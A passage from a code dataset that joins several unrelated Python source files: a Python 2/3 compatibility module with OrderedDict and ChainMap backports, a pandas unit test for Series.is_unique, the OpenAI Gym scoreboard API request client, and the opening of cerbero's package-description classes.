if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
# ZipFile is a context manager in 2.7, but not in 2.6
from zipfile import ZipFile as BaseZipFile
if hasattr(BaseZipFile, '__enter__'): # pragma: no cover
ZipFile = BaseZipFile
else:
from zipfile import ZipExtFile as BaseZipExtFile
class ZipExtFile(BaseZipExtFile):
def __init__(self, base):
self.__dict__.update(base.__dict__)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
# return None, so if an exception occurred, it will propagate
class ZipFile(BaseZipFile):
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
# return None, so if an exception occurred, it will propagate
def open(self, *args, **kwargs):
base = BaseZipFile.open(self, *args, **kwargs)
return ZipExtFile(base)
try:
from platform import python_implementation
except ImportError: # pragma: no cover
def python_implementation():
"""Return a string identifying the Python implementation."""
if 'PyPy' in sys.version:
return 'PyPy'
if os.name == 'java':
return 'Jython'
if sys.version.startswith('IronPython'):
return 'IronPython'
return 'CPython'
try:
import sysconfig
except ImportError: # pragma: no cover
from ._backport import sysconfig
try:
callable = callable
except NameError: # pragma: no cover
from collections import Callable
def callable(obj):
return isinstance(obj, Callable)
try:
fsencode = os.fsencode
fsdecode = os.fsdecode
except AttributeError: # pragma: no cover
_fsencoding = sys.getfilesystemencoding()
if _fsencoding == 'mbcs':
_fserrors = 'strict'
else:
_fserrors = 'surrogateescape'
def fsencode(filename):
if isinstance(filename, bytes):
return filename
elif isinstance(filename, text_type):
return filename.encode(_fsencoding, _fserrors)
else:
raise TypeError("expect bytes or str, not %s" %
type(filename).__name__)
def fsdecode(filename):
if isinstance(filename, text_type):
return filename
elif isinstance(filename, bytes):
return filename.decode(_fsencoding, _fserrors)
else:
raise TypeError("expect bytes or str, not %s" %
type(filename).__name__)
try:
from tokenize import detect_encoding
except ImportError: # pragma: no cover
from codecs import BOM_UTF8, lookup
import re
cookie_re = re.compile("coding[:=]\s*([-\w.]+)")
def _get_normal_name(orig_enc):
"""Imitates get_normal_name in tokenizer.c."""
# Only care about the first 12 characters.
enc = orig_enc[:12].lower().replace("_", "-")
if enc == "utf-8" or enc.startswith("utf-8-"):
return "utf-8"
if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or \
enc.startswith(("latin-1-", "iso-8859-1-", "iso-latin-1-")):
return "iso-8859-1"
return orig_enc
def detect_encoding(readline):
"""
The detect_encoding() function is used to detect the encoding that should
be used to decode a Python source file. It requires one argument, readline,
in the same way as the tokenize() generator.
It will call readline a maximum of twice, and return the encoding used
(as a string) and a list of any lines (left as bytes) it has read in.
It detects the encoding from the presence of a utf-8 bom or an encoding
cookie as specified in pep-0263. If both a bom and a cookie are present,
but disagree, a SyntaxError will be raised. If the encoding cookie is an
invalid charset, raise a SyntaxError. Note that if a utf-8 bom is found,
'utf-8-sig' is returned.
If no encoding is specified, then the default of 'utf-8' will be returned.
"""
try:
filename = readline.__self__.name
except AttributeError:
filename = None
bom_found = False
encoding = None
default = 'utf-8'
def read_or_stop():
try:
return readline()
except StopIteration:
return b''
def find_cookie(line):
try:
# Decode as UTF-8. Either the line is an encoding declaration,
# in which case it should be pure ASCII, or it must be UTF-8
# per default encoding.
line_string = line.decode('utf-8')
except UnicodeDecodeError:
msg = "invalid or missing encoding declaration"
if filename is not None:
msg = '{} for {!r}'.format(msg, filename)
raise SyntaxError(msg)
matches = cookie_re.findall(line_string)
if not matches:
return None
encoding = _get_normal_name(matches[0])
try:
codec = lookup(encoding)
except LookupError:
# This behaviour mimics the Python interpreter
if filename is None:
msg = "unknown encoding: " + encoding
else:
msg = "unknown encoding for {!r}: {}".format(filename,
encoding)
raise SyntaxError(msg)
if bom_found:
if codec.name != 'utf-8':
# This behaviour mimics the Python interpreter
if filename is None:
msg = 'encoding problem: utf-8'
else:
msg = 'encoding problem for {!r}: utf-8'.format(filename)
raise SyntaxError(msg)
encoding += '-sig'
return encoding
first = read_or_stop()
if first.startswith(BOM_UTF8):
bom_found = True
first = first[3:]
default = 'utf-8-sig'
if not first:
return default, []
encoding = find_cookie(first)
if encoding:
return encoding, [first]
second = read_or_stop()
if not second:
return default, [first]
encoding = find_cookie(second)
if encoding:
return encoding, [first, second]
return default, [first, second]
# For converting & <-> & etc.
try:
from html import escape
except ImportError:
from cgi import escape
if sys.version_info[:2] < (3, 4):
unescape = HTMLParser().unescape
else:
from html import unescape
try:
from collections import ChainMap
except ImportError: # pragma: no cover
from collections import MutableMapping
try:
from reprlib import recursive_repr as _recursive_repr
except ImportError:
def _recursive_repr(fillvalue='...'):
'''
Decorator to make a repr function return fillvalue for a recursive
call
'''
def decorating_function(user_function):
repr_running = set()
def wrapper(self):
key = id(self), get_ident()
if key in repr_running:
return fillvalue
repr_running.add(key)
try:
result = user_function(self)
finally:
repr_running.discard(key)
return result
# Can't use functools.wraps() here because of bootstrap issues
wrapper.__module__ = getattr(user_function, '__module__')
wrapper.__doc__ = getattr(user_function, '__doc__')
wrapper.__name__ = getattr(user_function, '__name__')
wrapper.__annotations__ = getattr(user_function, '__annotations__', {})
return wrapper
return decorating_function
class ChainMap(MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can
accessed or updated using the *maps* attribute. There is no other state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
return iter(set().union(*self.maps))
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return '{0.__class__.__name__}({1})'.format(
self, ', '.join(map(repr, self.maps)))
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self): # like Django's Context.push()
'New ChainMap with a new dict followed by all previous maps.'
return self.__class__({}, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def popitem(self):
'Remove and return an item pair from maps[0]. Raise KeyError is maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError('Key not found in the first mapping: {!r}'.format(key))
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
try:
from imp import cache_from_source
except ImportError: # pragma: no cover
def cache_from_source(path, debug_override=None):
assert path.endswith('.py')
if debug_override is None:
debug_override = __debug__
if debug_override:
suffix = 'c'
else:
suffix = 'o'
return path + suffix
try:
from collections import OrderedDict
except ImportError: # pragma: no cover
## {{{ http://code.activestate.com/recipes/576693/ (r9)
# Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running=None):
'od.__repr__() <==> repr(od)'
if not _repr_running: _repr_running = {}
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
try:
from logging.config import BaseConfigurator, valid_ident
except ImportError: # pragma: no cover
IDENTIFIER = re.compile('^[a-z_][a-z0-9_]*$', re.I)
def valid_ident(s):
m = IDENTIFIER.match(s)
if not m:
raise ValueError('Not a valid Python identifier: %r' % s)
return True
# The ConvertingXXX classes are wrappers around standard Python containers,
# and they serve to convert any suitable values in the container. The
# conversion converts base dicts, lists and tuples to their wrapped
# equivalents, whereas strings which match a conversion format are converted
# appropriately.
#
# Each wrapper should have a configurator attribute holding the actual
# configurator to use for conversion.
class ConvertingDict(dict):
"""A converting dictionary wrapper."""
def __getitem__(self, key):
value = dict.__getitem__(self, key)
result = self.configurator.convert(value)
#If the converted value is different, save for next time
if value is not result:
self[key] = result
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
result.key = key
return result
def get(self, key, default=None):
value = dict.get(self, key, default)
result = self.configurator.convert(value)
#If the converted value is different, save for next time
if value is not result:
self[key] = result
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
result.key = key
return result
def pop(self, key, default=None):
value = dict.pop(self, key, default)
result = self.configurator.convert(value)
if value is not result:
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
result.key = key
return result
class ConvertingList(list):
"""A converting list wrapper."""
def __getitem__(self, key):
value = list.__getitem__(self, key)
result = self.configurator.convert(value)
#If the converted value is different, save for next time
if value is not result:
self[key] = result
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
result.key = key
return result
def pop(self, idx=-1):
value = list.pop(self, idx)
result = self.configurator.convert(value)
if value is not result:
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
return result
class ConvertingTuple(tuple):
"""A converting tuple wrapper."""
def __getitem__(self, key):
value = tuple.__getitem__(self, key)
result = self.configurator.convert(value)
if value is not result:
if type(result) in (ConvertingDict, ConvertingList,
ConvertingTuple):
result.parent = self
result.key = key
return result
class BaseConfigurator(object):
"""
The configurator base class which defines some useful defaults.
"""
CONVERT_PATTERN = re.compile(r'^(?P<prefix>[a-z]+)://(?P<suffix>.*)$')
WORD_PATTERN = re.compile(r'^\s*(\w+)\s*')
DOT_PATTERN = re.compile(r'^\.\s*(\w+)\s*')
INDEX_PATTERN = re.compile(r'^\[\s*(\w+)\s*\]\s*')
DIGIT_PATTERN = re.compile(r'^\d+$')
value_converters = {
'ext' : 'ext_convert',
'cfg' : 'cfg_convert',
}
# We might want to use a different one, e.g. importlib
importer = staticmethod(__import__)
def __init__(self, config):
self.config = ConvertingDict(config)
self.config.configurator = self
def resolve(self, s):
"""
Resolve strings to objects using standard import and attribute
syntax.
"""
name = s.split('.')
used = name.pop(0)
try:
found = self.importer(used)
for frag in name:
used += '.' + frag
try:
found = getattr(found, frag)
except AttributeError:
self.importer(used)
found = getattr(found, frag)
return found
except ImportError:
e, tb = sys.exc_info()[1:]
v = ValueError('Cannot resolve %r: %s' % (s, e))
v.__cause__, v.__traceback__ = e, tb
raise v
def ext_convert(self, value):
"""Default converter for the ext:// protocol."""
return self.resolve(value)
def cfg_convert(self, value):
"""Default converter for the cfg:// protocol."""
rest = value
m = self.WORD_PATTERN.match(rest)
if m is None:
raise ValueError("Unable to convert %r" % value)
else:
rest = rest[m.end():]
d = self.config[m.groups()[0]]
#print d, rest
while rest:
m = self.DOT_PATTERN.match(rest)
if m:
d = d[m.groups()[0]]
else:
m = self.INDEX_PATTERN.match(rest)
if m:
idx = m.groups()[0]
if not self.DIGIT_PATTERN.match(idx):
d = d[idx]
else:
try:
n = int(idx) # try as number first (most likely)
d = d[n]
except TypeError:
d = d[idx]
if m:
rest = rest[m.end():]
else:
raise ValueError('Unable to convert '
'%r at %r' % (value, rest))
#rest should be empty
return d
def convert(self, value):
"""
Convert values to an appropriate type. dicts, lists and tuples are
replaced by their converting alternatives. Strings are checked to
see if they have a conversion format and are converted if they do.
"""
if not isinstance(value, ConvertingDict) and isinstance(value, dict):
value = ConvertingDict(value)
value.configurator = self
elif not isinstance(value, ConvertingList) and isinstance(value, list):
value = ConvertingList(value)
value.configurator = self
elif not isinstance(value, ConvertingTuple) and\
isinstance(value, tuple):
value = ConvertingTuple(value)
value.configurator = self
elif isinstance(value, string_types):
m = self.CONVERT_PATTERN.match(value)
if m:
d = m.groupdict()
prefix = d['prefix']
converter = self.value_converters.get(prefix, None)
if converter:
suffix = d['suffix']
converter = getattr(self, converter)
value = converter(suffix)
return value
def configure_custom(self, config):
"""Configure an object with a user-supplied factory."""
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
kwargs = dict([(k, config[k]) for k in config if valid_ident(k)])
result = c(**kwargs)
if props:
for name, value in props.items():
setattr(result, name, value)
return result
def as_tuple(self, value):
"""Utility function which converts lists to tuples."""
if isinstance(value, list):
value = tuple(value)
return value
| mit |
datapythonista/pandas | pandas/tests/series/methods/test_is_unique.py | 6 | 1050 | import numpy as np
import pytest
from pandas import Series
from pandas.core.construction import create_series_with_explicit_dtype
@pytest.mark.parametrize(
"data, expected",
[
(np.random.randint(0, 10, size=1000), False),
(np.arange(1000), True),
([], True),
([np.nan], True),
(["foo", "bar", np.nan], True),
(["foo", "foo", np.nan], False),
(["foo", "bar", np.nan, np.nan], False),
],
)
def test_is_unique(data, expected):
# GH#11946 / GH#25180
ser = create_series_with_explicit_dtype(data, dtype_if_empty=object)
assert ser.is_unique is expected
def test_is_unique_class_ne(capsys):
# GH#20661
class Foo:
def __init__(self, val):
self._value = val
def __ne__(self, other):
raise Exception("NEQ not supported")
with capsys.disabled():
li = [Foo(i) for i in range(5)]
ser = Series(li, index=list(range(5)))
ser.is_unique
captured = capsys.readouterr()
assert len(captured.err) == 0
| bsd-3-clause |
d1hotpep/openai_gym | gym/scoreboard/client/api_requestor.py | 7 | 5747 | import json
import platform
import six.moves.urllib as urlparse
from six import iteritems
from gym import error, version
import gym.scoreboard.client
from gym.scoreboard.client import http_client
verify_ssl_certs = True # [SECURITY CRITICAL] only turn this off while debugging
http_client = http_client.RequestsClient(verify_ssl_certs=verify_ssl_certs)
def _build_api_url(url, query):
scheme, netloc, path, base_query, fragment = urlparse.urlsplit(url)
if base_query:
query = '%s&%s' % (base_query, query)
return urlparse.urlunsplit((scheme, netloc, path, query, fragment))
def _strip_nulls(params):
if isinstance(params, dict):
stripped = {}
for key, value in iteritems(params):
value = _strip_nulls(value)
if value is not None:
stripped[key] = value
return stripped
else:
return params
class APIRequestor(object):
def __init__(self, key=None, api_base=None):
self.api_base = api_base or gym.scoreboard.api_base
self.api_key = key
self._client = http_client
def request(self, method, url, params=None, headers=None):
rbody, rcode, rheaders, my_api_key = self.request_raw(
method.lower(), url, params, headers)
resp = self.interpret_response(rbody, rcode, rheaders)
return resp, my_api_key
def handle_api_error(self, rbody, rcode, resp, rheaders):
# Rate limits were previously coded as 400's with code 'rate_limit'
if rcode == 429:
raise error.RateLimitError(
resp.get('detail'), rbody, rcode, resp, rheaders)
elif rcode in [400, 404]:
type = resp.get('type')
if type == 'about:blank':
type = None
raise error.InvalidRequestError(
resp.get('detail'), type,
rbody, rcode, resp, rheaders)
elif rcode == 401:
raise error.AuthenticationError(
resp.get('detail'), rbody, rcode, resp,
rheaders)
else:
detail = resp.get('detail')
# This information will only be returned to developers of
# the OpenAI Gym Scoreboard.
dev_info = resp.get('dev_info')
if dev_info:
detail = "{}\n\n<dev_info>\n{}\n</dev_info>".format(detail, dev_info['traceback'])
raise error.APIError(detail, rbody, rcode, resp,
rheaders)
def request_raw(self, method, url, params=None, supplied_headers=None):
"""
Mechanism for issuing an API call
"""
if self.api_key:
my_api_key = self.api_key
else:
my_api_key = gym.scoreboard.api_key
if my_api_key is None:
raise error.AuthenticationError("""You must provide an OpenAI Gym API key.
(HINT: Set your API key using "gym.scoreboard.api_key = .." or "export OPENAI_GYM_API_KEY=..."). You can find your API key in the OpenAI Gym web interface: https://gym.openai.com/settings/profile.""")
abs_url = '%s%s' % (self.api_base, url)
if params:
encoded_params = json.dumps(_strip_nulls(params))
else:
encoded_params = None
if method == 'get' or method == 'delete':
if params:
abs_url = _build_api_url(abs_url, encoded_params)
post_data = None
elif method == 'post':
post_data = encoded_params
else:
raise error.APIConnectionError(
'Unrecognized HTTP method %r. This may indicate a bug in the '
'OpenAI Gym bindings. Please contact gym@openai.com for '
'assistance.' % (method,))
ua = {
'bindings_version': version.VERSION,
'lang': 'python',
'publisher': 'openai',
'httplib': self._client.name,
}
for attr, func in [['lang_version', platform.python_version],
['platform', platform.platform]]:
try:
val = func()
except Exception as e:
val = "!! %s" % (e,)
ua[attr] = val
headers = {
'Openai-Gym-User-Agent': json.dumps(ua),
'User-Agent': 'Openai-Gym/v1 PythonBindings/%s' % (version.VERSION,),
'Authorization': 'Bearer %s' % (my_api_key,)
}
if method == 'post':
headers['Content-Type'] = 'application/json'
if supplied_headers is not None:
for key, value in supplied_headers.items():
headers[key] = value
rbody, rcode, rheaders = self._client.request(
method, abs_url, headers, post_data)
return rbody, rcode, rheaders, my_api_key
def interpret_response(self, rbody, rcode, rheaders):
content_type = rheaders.get('Content-Type', '')
if content_type.startswith('text/plain'):
# Pass through plain text
resp = rbody
if not (200 <= rcode < 300):
self.handle_api_error(rbody, rcode, {}, rheaders)
else:
# TODO: Be strict about other Content-Types
try:
if hasattr(rbody, 'decode'):
rbody = rbody.decode('utf-8')
resp = json.loads(rbody)
except Exception:
raise error.APIError(
"Invalid response body from API: %s "
"(HTTP response code was %d)" % (rbody, rcode),
rbody, rcode, rheaders)
if not (200 <= rcode < 300):
self.handle_api_error(rbody, rcode, resp, rheaders)
return resp
| mit |
multipath-rtp/cerbero | cerbero/packages/package.py | 1 | 23059 | # cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
from cerbero.build.filesprovider import FilesProvider
from cerbero.enums import License, Platform
from cerbero.packages import PackageType
from cerbero.utils import remove_list_duplicates
class PackageBase(object):
'''
Base class for packages with the common field to describe a package
@cvar name: name of the package
@type name: str
@cvar shortdesc: Short description of the package
@type shortdesc: str
@cvar longdesc: Long description of the package
@type longdesc: str
@cvar version: version of the package
@type version: str
@cvar codename: codename of the release
@type codename: str
@cvar uuid: unique id for this package
@type uuid: str
@cvar license: package license
@type license: License
@cvar vendor: vendor for this package
@type vendor: str
@cvar org: organization for this package (eg: net.foo.bar)
@type org: str
@cvar url: url for this pacakge
@type url: str
@cvar sys_deps: system dependencies for this package
@type sys_deps: dict
@cvar sys_deps_devel: development system dependencies for this package
@type sys_deps_devel: dict
@cvar ignore_package_prefix: don't use the package prefix set in the config
@type ignore_package_prefix: bool
@cvar relocate_osx_binaries: relocate osx binaries
@type relocate_osx_binaries: bool
@cvar resources_license: filename of the .txt license file
@type resources_license: str
@cvar resources_license_unwrapped: filename of the .txt license file
withouth the 80 chars wrapping
@type resources_license_unwrapped: str
@cvar resources_license_rtf: filename of .rtf license file
@type resources_license_rtf: str
@cvar resources_icon: filename of the .ico icon
@type resources_icon: str
@cvar resources_icon_icns: filename of the .icsn icon
@type resources_icon_icns: str
@cvar resources_backgound = filename of the background image
@type resources_backgound = str
@cvar resources_preinstall = filename for the pre-installation script
@type resources_preinstall = str
@cvar resources_postinstall = filename for the post-installation script
@type resources_postinstall = str
@cvar resources_postremove = filename for the post-remove script
@type resources_postremove = str
'''
name = 'default'
shortdesc = 'default'
longdesc = 'default'
version = '1.0'
codename = None
org = 'default'
uuid = None
license = License.GPL
vendor = 'default'
url = 'default'
ignore_package_prefix = False
sys_deps = {}
sys_deps_devel = {}
relocate_osx_binaries = True
resources_license = 'license.txt'
resources_license_unwrapped = 'license_unwrapped.txt'
resources_license_rtf = 'license.txt'
resources_icon = 'icon.ico'
resources_icon_icns = 'icon.icns'
resources_background = 'background.png'
resources_preinstall = 'preinstall'
resources_postinstall = 'postinstall'
resources_postremove = 'postremove'
def __init__(self, config, store):
self.config = config
self.store = store
self.package_mode = PackageType.RUNTIME
def prepare(self):
'''
Can be overrided by subclasses to modify conditionally the package
'''
pass
def load_files(self):
pass
def package_dir(self):
'''
Gets the directory path where this package is stored
@return: directory path
@rtype: str
'''
return os.path.dirname(self.__file__)
def relative_path(self, path):
'''
Gets a path relative to the package's directory
@return: absolute path relative to the pacakge's directory
@rtype: str
'''
return os.path.abspath(os.path.join(self.package_dir(), path))
def files_list(self):
raise NotImplemented("'files_list' must be implemented by subclasses")
def devel_files_list(self):
raise NotImplemented("'devel_files_list' must be implemented by "
"subclasses")
def all_files_list(self):
raise NotImplemented("'all_files_list' must be implemented by "
"subclasses")
def post_install(self, paths):
pass
def set_mode(self, package_type):
self.package_mode = package_type
def get_install_dir(self):
try:
return self.install_dir[self.config.target_platform]
except:
return self.config.install_dir
def get_sys_deps(self, package_mode=None):
package_mode = package_mode or self.package_mode
if package_mode == PackageType.RUNTIME:
sys_deps = self.sys_deps
if package_mode == PackageType.DEVEL:
sys_deps = self.sys_deps_devel
if self.config.target_distro_version in sys_deps:
return sys_deps[self.config.target_distro_version]
if self.config.target_distro in sys_deps:
return sys_deps[self.config.target_distro]
return []
def identifier(self):
return '%s.%s.%s' % (self.org, self.config.target_arch, self.name)
def __str__(self):
return self.name
def __getattribute__(self, name):
attr = object.__getattribute__(self, name)
# Return relative path for resources
if name.startswith('resources'):
if attr is not None:
attr = self.relative_path(attr)
elif name == 'name':
attr += self.package_mode
elif name == 'shortdesc':
if self.package_mode == PackageType.DEVEL:
attr += ' (Development Files)'
elif name == 'uuid':
if self.package_mode == PackageType.DEVEL:
if attr is not None:
# Used the change the upgrade code for the devel package
uuid = list(attr)
if uuid[0] != '0':
uuid[0] = '0'
else:
uuid[0] = '1'
attr = ''.join(uuid)
return attr
class Package(PackageBase):
'''
Describes a set of files to produce disctribution packages for the
different target platforms. It provides the first level of packaging
allowing to create modular installers by aggregating several of them.
On Windows it will create a Merge Module (.msm) that can be easilly
integrated in an installer (.msi).
On OS X, it will produce a Package (.pkg) that can be integrated
in a MetaPackager.
On Linux it will create regular distribution packages such as a .deb on
Debian or a .rpm on RedHat
@cvar deps: list of packages dependencies
@type deps: list
@cvar files: list of files included in this package
@type files: list
@cvar platform_files: dict of platform files included in this package
@type platform_files: dict
@cvar files_devel: list of devel files included in this package
@type files_devel: list
@cvar platform_files_devel: dict of platform devel files included in
this package
@type platform_files_Devel: dict
@cvar osx_framework_library: name and link for the Framework library
@type osx_framework_library: tuple
'''
deps = list()
files = list()
platform_files = dict()
files_devel = list()
platform_files_devel = dict()
osx_framework_library = None
def __init__(self, config, store, cookbook):
PackageBase.__init__(self, config, store)
self.cookbook = cookbook
def load_files(self):
self._files = self.files + \
self.platform_files.get(self.config.target_platform, [])
self._files_devel = self.files_devel + \
self.platform_files_devel.get(self.config.target_platform, [])
self._parse_files()
def recipes_dependencies(self, use_devel=True):
deps = [x.split(':')[0] for x in self._files]
if use_devel:
deps.extend([x.split(':')[0] for x in self._files_devel])
for name in self.deps:
p = self.store.get_package(name)
